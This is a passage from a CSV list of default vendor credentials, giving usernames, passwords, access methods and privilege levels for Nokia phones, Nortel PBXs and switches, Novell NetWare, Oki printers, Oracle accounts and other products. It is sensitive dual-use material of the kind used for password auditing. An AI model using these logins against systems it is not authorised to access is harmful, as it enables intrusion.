BIOS,,Console,,SKY_FOX,Admin,,\nno,no,,microsoft,9000,1234567890,,,\nnokia,7360,,Multi,,9999,Admin,,\nnokia,770,,,root,rootme,Admin,,\nnokia,DSL Router M1122,,1.1 - 1.2,m1122,m1122,,,\nnokia,DSL Router M1122,,Administrator,Telecom,Telecom,,,\nnokia,DSL Router M1122,,Multi,Telecom,Telecom,Administrator,,\nnokia,DSL Router M1122,,User,m1122,m1122,,,\nnokia,DSL Router M1122,1.1 - 1.2,Multi,m1122,m1122,User,,\nnokia,M10,,,Telecom,Telecom,,,\nnokia,MW1122,,Multi,telecom,telecom,Admin,Only in New Zealand.,\nnokia,all mobiles,,Security Code,nop,12345,,,\nnokia,all mobiles,nop,Multi,nop,12345,Security Code,,\nnokia,most Nokia cell phones,all,except some of newest models,*3001#12345#,,, can be reset.,\nnokia,most Nokia cell phones,all,except some of newest models,*3001#12345#,,,goes into the program screen shows security code can be reset.,\nnokia,n800,all,ssh (remote or localhost),root,rootme,root user,by default ssh not installed,\nnokia,nokia,,,root,nokia,,,\nnokia,nokia,,security code,nop,123454,,,\nnokia,phone,,voicemail,client,client,,,\nnorstar,Meridian KSU,,Admin,**23646,23646,,,\nnorstar,Meridian KSU,,Config,**266344,266344,,,\nnortel,Accelar (Passport) 1000 series routing switches,,,l2,l2,,,\nnortel,Accelar (Passport) 1000 series routing switches,,,l3,l3,,,\nnortel,Accelar (Passport) 1000 series routing switches,,,ro,ro,,,\nnortel,Accelar (Passport) 1000 series routing switches,,,rw,rw,,,\nnortel,Accelar (Passport) 1000 series routing switches,,,rwa,rwa,,,\nnortel,Accelar (Passport) 1000 series routing switches,,Layer 2 Read Write,l2,l2,,,\nnortel,Accelar (Passport) 1000 series routing switches,,Layer 3 (and layer 2) Read Write,l3,l3,,,\nnortel,Accelar (Passport) 1000 series routing switches,,Multi,l2,l2,Layer 2 Read Write,,\nnortel,Accelar (Passport) 1000 series routing switches,,Multi,l3,l3,Layer 3 (and layer 2) Read Write,,\nnortel,Accelar (Passport) 1000 series routing switches,,Multi,ro,ro,Read Only,,\nnortel,Accelar (Passport) 1000 series routing switches,,Multi,rw,rw,Read Write,,\nnortel,Accelar (Passport) 1000 series routing switches,,Multi,rwa,rwa,Read Write All,,\nnortel,Accelar (Passport) 1000 series routing switches,,Read Only,ro,ro,,,\nnortel,Accelar (Passport) 1000 series routing switches,,Read Write All,rwa,rwa,,,\nnortel,Accelar (Passport) 1000 series routing switches,,Read Write,rw,rw,,,\nnortel,BCM,,3.5 - 3-7,administrator,PlsChgMe!,,,\nnortel,BCM,,3.5 - 3-7,supervisor,visor,,,\nnortel,BayStack,,310/303,,secure,,,\nnortel,Baystack 350-24T,,,,secure,,,\nnortel,Baystack 350-24T,,Admin,,secure,,,\nnortel,Baystack or Etherswitch 460/470/5500,,SNMP or Java Device Manager,RO,user,Read Only,,\nnortel,Baystack or Etherswitch 460/470/5500,,SNMP or Java Device Manager,RW,secure,Admin,,\nnortel,Baystack,310/303,,,,Admin,,\nnortel,Baystack,310/303,,,secure,Admin,,\nnortel,Baystack,350-24T,Telnet,,secure,Admin,,\nnortel,Business Communications Manager,3.5 and 3.6,https,supervisor,PlsChgMe!,Admin,Note exclamation in password,\nnortel,Business Communications Manager,3.5-3.7,,administrator,PlsChgMe!,Admin,Note exclamation in password,\nnortel,Business Communications Manager,3.5-3.7,,supervisor,visor,Admin,,\nnortel,Contivity Extranet Switches,2.x,,admin,setup,,,\nnortel,Contivity Switch,,,admin,setup,,,\nnortel,Contivity,,Admin,admin,setup,,,\nnortel,Contivity,,Extranet/VPN switches,admin,setup,,,\nnortel,Contivity,Extranet/VPN switches,HTTP,admin,setup,Admin,,\nnortel,Extranet Switches,,,admin,setup,,,\nnortel,Extranet Switches,,Admin,admin,setup,,,\nnortel,Extranet Switches,,Multi,admin,setup,Admin,,\nnortel,MIPCD,1.04,,user,,Admin,,\nnortel,MIPCD,1.04,FTP,user,user,r/w,,\nnortel,MIPCD,1.04,http,admin,admin,Admin,,\nnortel,MIPCD,1.5,,,,,,\nnortel,MIPCD,1.5,,user,,Admin,,\nnortel,MIPCD,1.5,,user,user,,,\nnortel,MIRAN,,,distrib,distrib0,Admin,,\nnortel,MIRAN,,,user,user0000,Admin,,\nnortel,MIRAN,3.xx,serial,admin,admin000,Admin,,\nnortel,Matra 6501 PBX,,,,0,,,\nnortel,Matra 6501 PBX,,Admin,,0000,,,\nnortel,Matra 6501 PBX,,Console,,0,Admin,,\nnortel,Matra 6501 PBX,,Console,,0000,Admin,,\nnortel,Meridian 1 PBX,,,0,0,,OS Release 2,\nnortel,Meridian CCR,,,ccrusr,ccrusr,,,\nnortel,Meridian CCR,,,disttech,4tas,,,\nnortel,Meridian CCR,,,maint,maint,,,\nnortel,Meridian CCR,,,service,smile,,,\nnortel,Meridian CCR,,Maintenance account,maint,maint,,,\nnortel,Meridian CCR,,Multi,disttech,4tas,engineer account,,\nnortel,Meridian CCR,,Multi,disttech,etas,engineer account,,\nnortel,Meridian CCR,,Multi,maint,maint,Maintenance account,,\nnortel,Meridian CCR,,Multi,service,smile,general engineer account,,\nnortel,Meridian CCR,,User account,ccrusr,ccrusr,,,\nnortel,Meridian CCR,,engineer account,disttech,4tas,,,\nnortel,Meridian CCR,,general engineer account,service,smile,,,\nnortel,Meridian CCR,,telnet/modem,ccrusr,ccrusr,User account,,\nnortel,Meridian CCR,,telnet/modem,mlusr,mlusr,user account,,\nnortel,Meridian CCR,,telnet/modem,trmcnfg,trmcnfg,,,\nnortel,Meridian Integrated Conference Bridge,,,admin,,,,\nnortel,Meridian Integrated Conference Bridge,,,admin,000000,,,\nnortel,Meridian Integrated Conference Bridge,,,conferencing,admin,,,\nnortel,Meridian Integrated Conference Bridge,,,debug,gubed,,,\nnortel,Meridian KSU,,Console,**23646,23646,Admin,,\nnortel,Meridian KSU,,Console,**266344,266344,Config,,\nnortel,Meridian Link,,,disttech,4tas,,,\nnortel,Meridian Link,,,maint,maint,,,\nnortel,Meridian Link,,,mlusr,mlusr,,,\nnortel,Meridian Link,,,service,smile,,,\nnortel,Meridian Link,,Maintenance account,maint,maint,,,\nnortel,Meridian Link,,Multi,disttech,4tas,engineer account,,\nnortel,Meridian Link,,Multi,disttech,etas,engineer account,,\nnortel,Meridian Link,,Multi,maint,maint,Maintenance account,,\nnortel,Meridian Link,,Multi,service,smile,general engineer account,,\nnortel,Meridian Link,,engineer account,disttech,4tas,,,\nnortel,Meridian Link,,general engineer account,service,smile,,,\nnortel,Meridian Link,,telnet/modem,ccrusr,ccrusr,User account,,\nnortel,Meridian Link,,telnet/modem,mlusr,mlusr,user account,,\nnortel,Meridian Link,,telnet/modem,trmcnfg,trmcnfg,,,\nnortel,Meridian Link,,user account,mlusr,mlusr,,,\nnortel,Meridian Link/CCR/Max,,,ccrusr,ccrusr,,,\nnortel,Meridian Link/CCR/Max,,,disttech,4tas,,,\nnortel,Meridian Link/CCR/Max,,,disttech,disttech,,,\nnortel,Meridian Link/CCR/Max,,,maint,maint,,,\nnortel,Meridian Link/CCR/Max,,,mlusr,mlusr,,,\nnortel,Meridian Link/CCR/Max,,,service,smile,,,\nnortel,Meridian Link/CCR/Max,,,trmcnfg,trmcnfg,,,\nnortel,Meridian MAX,,,maint,ntacdmax,,,\nnortel,Meridian MAX,,,root,3ep5w2u,,,\nnortel,Meridian MAX,,,service,smile,,,\nnortel,Meridian MAX,,Admin,root,3ep5w2u,,,\nnortel,Meridian MAX,,Maintenance account,maint,ntacdmax,,,\nnortel,Meridian MAX,,general engineer account,service,smile,,,\nnortel,Meridian Mail,10.xx,AX in serial,admin,admin,Admin,,\nnortel,Meridian Mail,13.xx,AX in serial,system,adminpwd,Admin,,\nnortel,Meridian Max,,Multi,maint,maint,Maintenance account,,\nnortel,Meridian Max,,Multi,maint,ntacdmax,Maintenance account,,\nnortel,Meridian Max,,Multi,root,3ep5w2u,Admin,,\nnortel,Meridian Max,,Multi,service,smile,general engineer account,,\nnortel,Meridian Max,,telnet/modem,disttech,4tas,,,\nnortel,Meridian Max,,telnet/modem,disttech,etas,,,\nnortel,Meridian Max,,telnet/modem,mlusr,mlusr,user account,,\nnortel,Meridian Max,,telnet/modem,trmcnfg,trmcnfg,,,\nnortel,Meridian Max,,telnet/moden,ccrusr,ccrusr,User account,,\nnortel,Meridian PBX,,,login,0,,,\nnortel,Meridian PBX,,,login,0000,,,\nnortel,Meridian PBX,,,login,1111,,,\nnortel,Meridian PBX,,,login,8429,,,\nnortel,Meridian PBX,,,spcl,0,,,\nnortel,Meridian PBX,,,spcl,0000,,,\nnortel,Meridian PBX,,Serial,login,0,,,\nnortel,Meridian PBX,,Serial,login,0,,AUTH codes in LD 8,\nnortel,Meridian PBX,,Serial,login,0000,,,\nnortel,Meridian PBX,,Serial,login,1111,,AUTH codes in LD 8,\nnortel,Meridian PBX,,Serial,login,8429,,AUTH codes in LD 8,\nnortel,Meridian PBX,,Serial,spcl,0,,,\nnortel,Meridian PBX,,Serial,spcl,0,,AUTH codes in LD 8,\nnortel,Meridian PBX,,Serial,spcl,0000,,,\nnortel,Meridian,,,,,,,\nnortel,Meridian,,Admin,,,,,\nnortel,Meridian,,Multi,,,Admin,,\nnortel,Millennium,,keypad while hung up,,2727378,Maintenance,,\nnortel,Norstar Modular ICS,,,**ADMIN (**23646),ADMIN (23646),,Any,\nnortel,Norstar Modular ICS,,,**CONFIG (266344),CONFIG (266344),,Any,\nnortel,Norstar,,Console,266344,266344,Admin,,\nnortel,Phone System,All,From Phone,,266344,Installers,,\nnortel,Remote Office 9150,,,admin,root,,,\nnortel,Remote Office 9150,,Admin,admin,root,,,\nnortel,Remote Office 9150,,Client,admin,root,Admin,,\nnortel,Shasta,,,admin,admin,,any,\nnortel,Symposium,,,sysadmin,nortel,,,\nnortel,Symposium,,,sysadmin,nortel,Admin,,\nnortel,dms,,Multi,,,Admin,,\nnortel,p8600,,Multi,,,Admin,,\nnovatel,MiFi 2352,,192.168.1.1,admin,admin,Admin,,\nnovell,Groupwise 5.5 Enhancement Pack,,,servlet,manager,,,\nnovell,Groupwise 6.0,,,servlet,manager,,,\nnovell,Groupwise,,5.5 Enhancement Pack,servlet,manager,,,\nnovell,Groupwise,,6,servlet,manager,,,\nnovell,Groupwise,,Servlet Mgr,servlet,manager,,,\nnovell,Groupwise,5.5 Enhancement Pack,HTTP,servlet,manager,Servlet Mgr,,\nnovell,Groupwise,6,HTTP,servlet,manager,Servlet Mgr,,\nnovell,Groupwise,6.0,HTTP,servlet,manager,Servlet Mgr,,\nnovell,NDS iMonitor,,,sadmin,,,,\nnovell,NDS iMonitor,,http,sadmin,,Admin,,\nnovell,NetWare,,,BACKUP,,,Any,\nnovell,NetWare,,,CHEY_ARCHSVR,WONDERLAND,,Arcserve,\nnovell,NetWare,,,GATE,,,Any,\nnovell,NetWare,,,GATEWAY,,,Any,\nnovell,NetWare,,,HPLASER,,,Any,\nnovell,NetWare,,,LASER,,,Any,\nnovell,NetWare,,,LASERWRITER,,,Any,\nnovell,NetWare,,,MAIL,,,Any,\nnovell,NetWare,,,POST,,,Any,\nnovell,NetWare,,,PRINT,,,any,\nnovell,NetWare,,,PRINTER,,,Any,\nnovell,NetWare,,,ROUTER,,,Any,\nnovell,NetWare,,,WINDOWS_PASSTHRU,,,Any,\nnovell,NetWare,,,guest,,,Any,\nnovell,Netware,,,ADMIN,,,,\nnovell,Netware,,,ADMIN,ADMIN,,,\nnovell,Netware,,,ARCHIVIST,,,,\nnovell,Netware,,,ARCHIVIST,ARCHIVIST,,,\nnovell,Netware,,,BACKUP,,,,\nnovell,Netware,,,BACKUP,BACKUP,,,\nnovell,Netware,,,CHEY_ARCHSVR,,,,\nnovell,Netware,,,CHEY_ARCHSVR,CHEY_ARCHSVR,,,\nnovell,Netware,,,FAX,,,,\nnovell,Netware,,,FAX,FAX,,,\nnovell,Netware,,,FAXUSER,,,,\nnovell,Netware,,,FAXUSER,FAXUSER,,,\nnovell,Netware,,,FAXWORKS,,,,\nnovell,Netware,,,FAXWORKS,FAXWORKS,,,\nnovell,Netware,,,GATEWAY,,,,\nnovell,Netware,,,GATEWAY,GATEWAY,,,\nnovell,Netware,,,GUEST,,,,\nnovell,Netware,,,GUEST,GUEST,,,\nnovell,Netware,,,GUEST,GUESTGUE,,,\nnovell,Netware,,,GUEST,GUESTGUEST,,,\nnovell,Netware,,,GUEST,TSEUG,,,\nnovell,Netware,,,HPLASER,,,,\nnovell,Netware,,,HPLASER,HPLASER,,,\nnovell,Netware,,,LASER,,,,\nnovell,Netware,,,LASER,LASER,,,\nnovell,Netware,,,LASERWRITER,,,,\nnovell,Netware,,,LASERWRITER,LASERWRITER,,,\nnovell,Netware,,,MAIL,,,,\nnovell,Netware,,,MAIL,MAIL,,,\nnovell,Netware,,,POST,,,,\nnovell,Netware,,,POST,POST,,,\nnovell,Netware,,,PRINT,,,,\nnovell,Netware,,,PRINT,PRINT,,,\nnovell,Netware,,,PRINTER,,,,\nnovell,Netware,,,PRINTER,PRINTER,,,\nnovell,Netware,,,ROOT,,,,\nnovell,Netware,,,ROOT,ROOT,,,\nnovell,Netware,,,ROUTER,,,,\nnovell,Netware,,,SABRE,,,,\nnovell,Netware,,,SUPERVISOR,,,,\nnovell,Netware,,,SUPERVISOR,HARRIS,,,\nnovell,Netware,,,SUPERVISOR,NETFRAME,,,\nnovell,Netware,,,SUPERVISOR,NF,,,\nnovell,Netware,,,SUPERVISOR,NFI,,,\nnovell,Netware,,,SUPERVISOR,SUPERVISOR,,,\nnovell,Netware,,,SUPERVISOR,SYSTEM,,,\nnovell,Netware,,,TEST,,,,\nnovell,Netware,,,TEST,TEST,,,\nnovell,Netware,,,USER_TEMPLATE,,,,\nnovell,Netware,,,USER_TEMPLATE,USER_TEMPLATE,,,\nnovell,Netware,,,WANGTEK,,,,\nnovell,Netware,,,WANGTEK,WANGTEK,,,\nnovell,Netware,,,WINDOWS_PASSTHRU,,,,\nnovell,Netware,,,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,,,\nnovell,Netware,,,WINSABRE,SABRE,,,\nnovell,Netware,,,WINSABRE,WINSABRE,,,\nnovell,Netware,,Multi,ADMIN,,,,\nnovell,Netware,,Multi,ADMIN,ADMIN,,,\nnovell,Netware,,Multi,ARCHIVIST,,,,\nnovell,Netware,,Multi,ARCHIVIST,ARCHIVIST,,,\nnovell,Netware,,Multi,BACKUP,,,,\nnovell,Netware,,Multi,BACKUP,BACKUP,,,\nnovell,Netware,,Multi,CHEY_ARCHSVR,,,,\nnovell,Netware,,Multi,CHEY_ARCHSVR,CHEY_ARCHSVR,,,\nnovell,Netware,,Multi,FAX,,,,\nnovell,Netware,,Multi,FAX,FAX,,,\nnovell,Netware,,Multi,FAXUSER,,,,\nnovell,Netware,,Multi,FAXUSER,FAXUSER,,,\nnovell,Netware,,Multi,FAXWORKS,,,,\nnovell,Netware,,Multi,FAXWORKS,FAXWORKS,,,\nnovell,Netware,,Multi,GATEWAY,,,,\nnovell,Netware,,Multi,GATEWAY,GATEWAY,,,\nnovell,Netware,,Multi,GUEST,,,,\nnovell,Netware,,Multi,GUEST,GUEST,,,\nnovell,Netware,,Multi,GUEST,GUESTGUE,,,\nnovell,Netware,,Multi,GUEST,GUESTGUEST,,,\nnovell,Netware,,Multi,GUEST,TSEUG,,,\nnovell,Netware,,Multi,HPLASER,,,,\nnovell,Netware,,Multi,HPLASER,HPLASER,,,\nnovell,Netware,,Multi,LASER,,,,\nnovell,Netware,,Multi,LASER,LASER,,,\nnovell,Netware,,Multi,LASERWRITER,,,,\nnovell,Netware,,Multi,LASERWRITER,LASERWRITER,,,\nnovell,Netware,,Multi,MAIL,,,,\nnovell,Netware,,Multi,MAIL,MAIL,,,\nnovell,Netware,,Multi,POST,,,,\nnovell,Netware,,Multi,POST,POST,,,\nnovell,Netware,,Multi,PRINT,,,,\nnovell,Netware,,Multi,PRINT,PRINT,,,\nnovell,Netware,,Multi,PRINTER,,,,\nnovell,Netware,,Multi,PRINTER,PRINTER,,,\nnovell,Netware,,Multi,ROOT,,,,\nnovell,Netware,,Multi,ROOT,ROOT,,,\nnovell,Netware,,Multi,ROUTER,,,,\nnovell,Netware,,Multi,SABRE,,,,\nnovell,Netware,,Multi,SUPERVISOR,,,,\nnovell,Netware,,Multi,SUPERVISOR,HARRIS,,,\nnovell,Netware,,Multi,SUPERVISOR,NETFRAME,,,\nnovell,Netware,,Multi,SUPERVISOR,NF,,,\nnovell,Netware,,Multi,SUPERVISOR,NFI,,,\nnovell,Netware,,Multi,SUPERVISOR,SUPERVISOR,,,\nnovell,Netware,,Multi,SUPERVISOR,SYSTEM,,,\nnovell,Netware,,Multi,TEST,,,,\nnovell,Netware,,Multi,TEST,TEST,,,\nnovell,Netware,,Multi,USER_TEMPLATE,,,,\nnovell,Netware,,Multi,USER_TEMPLATE,USER_TEMPLATE,,,\nnovell,Netware,,Multi,WANGTEK,,,,\nnovell,Netware,,Multi,WANGTEK,WANGTEK,,,\nnovell,Netware,,Multi,WINDOWS_PASSTHRU,,,,\nnovell,Netware,,Multi,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,,,\nnovell,Netware,,Multi,WINSABRE,SABRE,,,\nnovell,Netware,,Multi,WINSABRE,WINSABRE,,,\nnovell,Vibe,,,admin,admin,,,\nnovell,iChain,,1.5,,san fran 8,,,\nnovell,iChain,,2,,cr0wmt 911,,,\nnovell,iChain,,Admin,,cr0wmt 911,,,\nnovell,iChain,,Admin,,san fran 8,,,\nnovell,iChain,1.5,Console,,san fran 8,Admin,,\nnovell,iChain,2,Console,,cr0wmt 911,Admin,,\nnovell,iChain,2.0,Console,,cr0wmt 911,Admin,,\nnovell,iChain/ICS,,1.2 2.0,,root,,,\nnovell,iChain/ICS,,Admin,,root,,,\nnovell,iChain/ICS,1.2 2.0,Telnet,,root,Admin,,\nnovell,iManager,,2.0.1,admin,novell,,,\nnovell,iManager,2.0.1,,,admin,novell,,\nnovell,iManager,2.0.1,,admin,novell,Admin,,\nnrg,DSC338 Printer,1.19,HTTP,,password,Admin,no user,\nnrg,SP C312DN,1.03,,Admin,,Administrator,,\nnsi,vmXfw,,,root,nsi,Admin,,\nnullsoft,Shoutcast,1.9.5,PLS,admin,changeme,Admin,,\nnurit,PC BIOS,,,$system,,,,\nnurit,PC BIOS,,Admin,$system,,,,\nnurit,PC BIOS,,Console,$system,,Admin,,\noce,,,http,administrator,12345678,administrator,,\noce,Printers,,Admin,,0 and the number of OCE printer,,,\noce,Printers,Hardware,HTTP,,0 and the number of OCE printer,Admin,,\noce,TCS500,All Versions,Console,oceservice,ser4OCE!,Technical/Admin,Reboot for normal user mode.,\noce,TDS300,ALL,Direct,guest,RtFM!,,,\noce,TDS320,,console,System Administrator,SysAdm,,,\noce,TDS450,,,oceservice,ser4OCE!,tech/admin,,\noce,cm4010,,Web Console via IP Address,Administrator,admin,administrator level,,\noce,tcs500, Windows XP, all models,12.3.0(1668),console, http://192.168.0.81,,\noce,tcs500,Windows XP,all models,12.3.0(1668),console,http://192.168.0.81,,\nods,1094 IS Chassis,,,ods,ods,,4.x,\nods,1094,,,ods,ods,,,\noki,B411,all ver,Http or AdminManager,root,aaaaaa,Administrator,,\noki,B431,all ver,Http or AdminManager,root,aaaaaa,Administrator,,\noki,B431dn,,http://192.168.1.xxx,root,123456,Admin,,\noki,B6100n,,,admin,OkiLAN,admin,with 61e(NIC),\noki,B6200n,,,admin,OkiLAN,admin,with 62e(NIC),\noki,B6300n,,,admin,OkiLAN,admin,with 62e(NIC),\noki,B710,all,http://192.168.1.33,root,aaaaaa,Administrator,,\noki,B720,all,http://192.168.1.33,root,aaaaaa,Administrator,,\noki,B720N,All versions,Web interface,root,aaaaaa,Root access,,\noki,B730,all,http://192.168.1.33,root,aaaaaa,Administrator,,\noki,B8300n,,,admin,OkiLAN,admin,with 83e(NIC),\noki,C330,all versions etc.,http://192.168.0.1,root,aaaaaa,Admin,Administrator,\noki,C3450,,http://192.168.1.50,admin,heslo,admin,,\noki,C530dn,A1.02,http://192.168.1.51,root,aaaaaa,Admin,,\noki,C5550 MFP,,http,,*blank*,Admin,,\noki,C5650dn,,,,000000,menu,,\noki,C5650n,,,,000000,menu,,\noki,C6050dn,,,,000000,menu,,\noki,C6050n,,,,000000,menu,,\noki,C610,,,admin,aaaaaa,admin,,\noki,C6150dn,,,,000000,menu,,\noki,C6150dtn,,,,000000,menu,,\noki,C6150hdn,,,,000000,menu,,\noki,C6150n,,,,000000,menu,,\noki,C7000,,,admin,OkiLAN,admin,with 6200e(NIC),\noki,C711,,Web,admin,aaaaaa,Admin access,,\noki,C9000,,,admin,OkiLAN,admin,with 6200e(NIC),\noki,C9650,,,,0000,Print statistics,,\noki,C9650,,,,aaaaaa,Administration,,\noki,C9655,,printer menu,,aaaaaa,printer menubutton,,\noki,CX1145,,,,123456,,,\noki,CX2032 MFP,,http,,*blank*,Admin,,\noki,CX2033,,Printer Menu,,,,When asked for password just press OK,\noki,CX2633,,Web interface,admin,aaaaaa,admin,,\noki,CX2731,,Web interface,admin,aaaaaa,admin,,\noki,Color 8 +14ex,,,admin,OkiLAN,admin,with 6100e(NIC),\noki,ES5460 MFP,,Local configuration menu,,aaaaaa,Admin/Root i guess,,\noki,ES7120,,Web,root,aaaaaa,Admin,,\noki,ES7411,,web HTTP,admin,aaaaaa,Administrator,,\noki,ES8460,,http,admin,aaaaaa,,,\noki,MB460,,,root,aaaaaa,,,\noki,MB470,,,root,aaaaaa,,,\noki,MB480,,,root,aaaaaa,,,\noki,MC160,,Op Panel,,000000,Admin,,\noki,MC160,,Web,,sysAdmin,Admin,,\noki,MC342w,,,admin,aaaaaa,admin,,\noki,MC360,,Console,admin,aaaaaa,Full acces to printer configuration,,\noki,MC361,,Web interface,admin,aaaaaa,admin,,\noki,MC560,,Printer Menu,,,,When asked for password just press OK,\noki,MC560,,Printer Menu,,,,When asked for password,\noki,MC561,,Web interface,admin,aaaaaa,admin,,\noki,MC561dn,,http://,admin,aaaaaa,,,\noki,MC860,,Web interface,admin,aaaaaa,admin,,\noki,ML3xx,,,admin,OkiLAN,admin,with 6010e(NIC),6020e(NIC)\noki,ML491n,,http://,Admin,OkiLAN,Admin,,\noki,ML4xx,,,admin,OkiLAN,admin,with 6010e(NIC),6020e(NIC)\noki,N22113B,A2.00,http://192.168.1.9,,noe,Admin,,\noki,WebTools,,,Administrator,,,,\noki,b710,all,http://192.168.1.33,root,aaaaaa,Administrator,,\noki,c511dn,B7.00,,admin,aaaaaa,Full administrator Access,the machine picks up dhcp address,manually configure static on machine directly if required or print a config page to get the dhcp address that was assigned.\noki,c5750,n1.02,http://192.168.0.200,,,,,\noki,c810,1.0,192.100.185.78,admin,admin,admin,,\nolegkhabarov,Comfy CMS,,,username,password,,,\nolicom,8600,,9600,-,AaBbCcDd,,,\nolicom,8600,all,Serial,-,AaBbCcDd,9600,,\nolitec,sx 200 adsl modem router,,Multi,admin,adslolitec,Admin,default ip 192.168.0.250,\nolitec,sx 202 adsl modem router,,HTTP,admin,admin,Admin,Firmware: 2.7.0.9(UE0.B1C)3.3.0.23,\nomnitronix,Data-Link,DL150,Multi,,SMDR,Admin,,\nomnitronix,Data-Link,DL150,Multi,,SUPER,Admin,,\nomron,MR104FH,,Multi,,,Admin,,\noodie.com,odfaq,,admin,admin,admin,,,\noodiecom,odfaq,2.1.0,HTTP,admin,admin,admin,,\nopenconnect,OC://WebConnect Pro,,Multi,admin,OCS,Admin,,\nopenconnect,OC://WebConnect Pro,,Multi,adminstat,OCS,Admin,,\nopenconnect,OC://WebConnect Pro,,Multi,adminuser,OCS,Admin,,\nopenconnect,OC://WebConnect Pro,,Multi,adminview,OCS,Admin,,\nopenconnect,OC://WebConnect Pro,,Multi,helpdesk,OCS,Admin,,\nopengear,ACM5004-G,,192.168.0.1,root,default,Admin,,\nopenlink,Administration Assistant,,,admin,admin,,,\nopenmarket,Content Server,,,Bobo,hello,,,\nopenmarket,Content Server,,,Coco,hello,,,\nopenmarket,Content Server,,,Flo,hello,,,\nopenmarket,Content Server,,,Joe,hello,,,\nopenmarket,Content Server,,,Moe,hello,,,\nopenmarket,Content Server,,,admin,demo,,,\nopenmarket,Content Server,,,user_analyst,demo,,,\nopenmarket,Content Server,,,user_approver,demo,,,\nopenmarket,Content Server,,,user_author,demo,,,\nopenmarket,Content Server,,,user_checker,demo,,,\nopenmarket,Content Server,,,user_designer,demo,,,\nopenmarket,Content Server,,,user_editor,demo,,,\nopenmarket,Content Server,,,user_expert,demo,,,\nopenmarket,Content Server,,,user_marketer,demo,,,\nopenmarket,Content Server,,,user_pricer,demo,,,\nopenmarket,Content Server,,,user_publisher,demo,,,\nopenmarket,Content Server,,http,Admin,demo,Admin,,\nopenmarket,Content Server,,http,Bobo,hello,,,\nopenmarket,Content Server,,http,Coco,hello,,,\nopenmarket,Content Server,,http,Flo,hello,,,\nopenmarket,Content Server,,http,Joe,hello,,,\nopenmarket,Content Server,,http,Moe,hello,,,\nopenmarket,Content Server,,http,user_analyst,demo,,,\nopenmarket,Content Server,,http,user_approver,demo,,,\nopenmarket,Content Server,,http,user_author,demo,,,\nopenmarket,Content Server,,http,user_checker,demo,,,\nopenmarket,Content Server,,http,user_designer,demo,,,\nopenmarket,Content Server,,http,user_editor,demo,,,\nopenmarket,Content Server,,http,user_expert,demo,,,\nopenmarket,Content Server,,http,user_marketer,demo,,,\nopenmarket,Content Server,,http,user_pricer,demo,,,\nopenmarket,Content Server,,http,user_publisher,demo,,,\nopenmediavault,OpenMediaVault,,,admin,openmediavault,Web UI Admin,,\nopenmediavault,OpenMediaVault,,,root,openmediavault,root,,\nopennetworks,501R,,192.168.0.1,root,root,Admin,,\nopennetworks,531R,,,root,root,Admin,,\nopennetworks,812L,,192.168.10.1,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,824RLW,,192.168.1.254,admin,admin,Admin,,\nopennetworks,EasyChat 210,,,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 611,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 612,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 621,,192.168.1.254 or 192.168.1.1,admin,password,Admin,,\nopennetworks,iConnectAccess 621,,192.168.1.254 or 192.168.1.1,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 622,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 624,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 624W,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 625,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 625W,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopenwave,MSP,,Admin,cac_admin,cacadmin,,,\nopenwave,MSP,,Any,cac_admin,cacadmin,,,\nopenwave,MSP,Any,HTTP,cac_admin,cacadmin,Admin,,\nopenwave,WAP Gateway,,Admin,sys,uplink,,,\nopenwave,WAP Gateway,,Any,sys,uplink,,,\nopenwave,WAP Gateway,Any,HTTP,sys,uplink,Admin,,\nopenxchange,Open-Xchange LDAP,Open source versions below 0.8.2,,mailadmin,secret,high risk,,\nopenxchange,Open-Xchange Server,5,,mailadmin,secret,Admin,,\noptivision,Nac 3000 4000,,,root,mpegvideo,,any,\noptivision,Nac 3000 & 4000,,,root,mpegvideo,,any,\noptivision,Nac 3000,,,root,mpegvideo,,,\noptus,Counter-Strike,,1.3,Administrator,admin,,,\noptus,Counter-Strike,,Admin,Administrator,admin,,,\noptus,Counter-Strike,1.3,Multi,Administrator,admin,Admin,,\noracle corporation,Oracle,,,ABM,ABM,,,\noracle corporation,Oracle,,,ADAMS,WOOD,,,\noracle corporation,Oracle,,,ADLDEMO,ADLDEMO,,,\noracle corporation,Oracle,,,ADMIN,JETSPEED,,,\noracle corporation,Oracle,,,ADMINISTRATOR,ADMIN,,,\noracle corporation,Oracle,,,AHL,AHL,,,\noracle corporation,Oracle,,,AHM,AHM,,,\noracle corporation,Oracle,,,AK,AK,,,\noracle corporation,Oracle,,,ALHRO,XXX,,,\noracle corporation,Oracle,,,ALHRW,XXX,,,\noracle corporation,Oracle,,,ALR,ALR,,,\noracle corporation,Oracle,,,AMS,AMS,,,\noracle corporation,Oracle,,,AMV,AMV,,,\noracle corporation,Oracle,,,ANDY,SWORDFISH,,,\noracle corporation,Oracle,,,ANONYMOUS,ANONYMOUS,,,\noracle corporation,Oracle,,,AP,AP,,,\noracle corporation,Oracle,,,APPLMGR,APPLMGR,,,\noracle corporation,Oracle,,,APPLSYS,FND,,,\noracle corporation,Oracle,,,APPLSYSPUB,FNDPUB,,,\noracle corporation,Oracle,,,APPLYSYSPUB,PUB,,,\noracle corporation,Oracle,,,APPS,APPS,,,\noracle corporation,Oracle,,,APPS_MRC,APPS,,,\noracle corporation,Oracle,,,APPUSER,APPPASSWORD,,,\noracle corporation,Oracle,,,AQ,AQ,,,\noracle corporation,Oracle,,,AQDEMO,AQDEMO,,,\noracle corporation,Oracle,,,AQJAVA,AQJAVA,,,\noracle corporation,Oracle,,,AQUSER,AQUSER,,,\noracle corporation,Oracle,,,AR,AR,,,\noracle corporation,Oracle,,,ASF,ASF,,,\noracle corporation,Oracle,,,ASG,ASG,,,\noracle corporation,Oracle,,,ASL,ASL,,,\noracle 